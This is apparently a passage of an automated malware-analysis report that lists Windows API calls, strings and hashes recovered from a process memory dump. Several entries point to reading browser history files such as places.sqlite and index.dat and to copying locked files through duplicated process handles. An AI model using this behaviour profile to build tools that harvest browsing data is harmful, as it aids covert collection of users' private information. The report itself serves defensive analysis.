                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                    • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                    • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                  • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76272EE0), ref: 0040E3EC
                                                                                                                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                    • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                    • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                  • free.MSVCRT ref: 00418803
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                  • memset.MSVCRT ref: 00403A55
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                  • String ID: history.dat$places.sqlite
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                  • GetLastError.KERNEL32 ref: 00417627
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$File$PointerRead
                                                                                                                  • String ID:
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFindFirst
                                                                                                                  • String ID: *.*$index.dat
                                                                                                                  • API String ID: 1974802433-2863569691
                                                                                                                  APIs
                                                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1156039329-0
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                  • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3397143404-0
                                                                                                                  APIs
                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1125800050-0
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                  • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandleSleep
                                                                                                                  • String ID: }A
                                                                                                                  • API String ID: 252777609-2138825249
                                                                                                                  APIs
                                                                                                                  • malloc.MSVCRT ref: 00409A10
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                  • free.MSVCRT ref: 00409A31
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: freemallocmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3056473165-0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: d
                                                                                                                  • API String ID: 0-2564639436
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID: BINARY
                                                                                                                  • API String ID: 2221118986-907554435
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmp
                                                                                                                  • String ID: /stext
                                                                                                                  • API String ID: 2081463915-3817206916
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmp
                                                                                                                  • String ID: .'v
                                                                                                                  • API String ID: 2081463915-2049903856
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                  • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2445788494-0
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: malloc
                                                                                                                  • String ID: failed to allocate %u bytes of memory
                                                                                                                  • API String ID: 2803490479-1168259600
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0041BDDF
                                                                                                                  • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmpmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1065087418-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,00000000,?,?,00000001,00000000,?,00000000), ref: 00406E09
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00406E5A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$??2@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3700833809-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                                  • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1381354015-0
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004301AD
                                                                                                                  • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1297977491-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1294909896-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                    • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                    • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2154303073-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3150196962-0
                                                                                                                  APIs
                                                                                                                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: File$PointerRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3154509469-0
                                                                                                                  APIs
                                                                                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4232544981-0
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$FileModuleName
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3859505661-0
                                                                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                  • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                  • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                  APIs
                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FileRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2738559852-0
                                                                                                                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
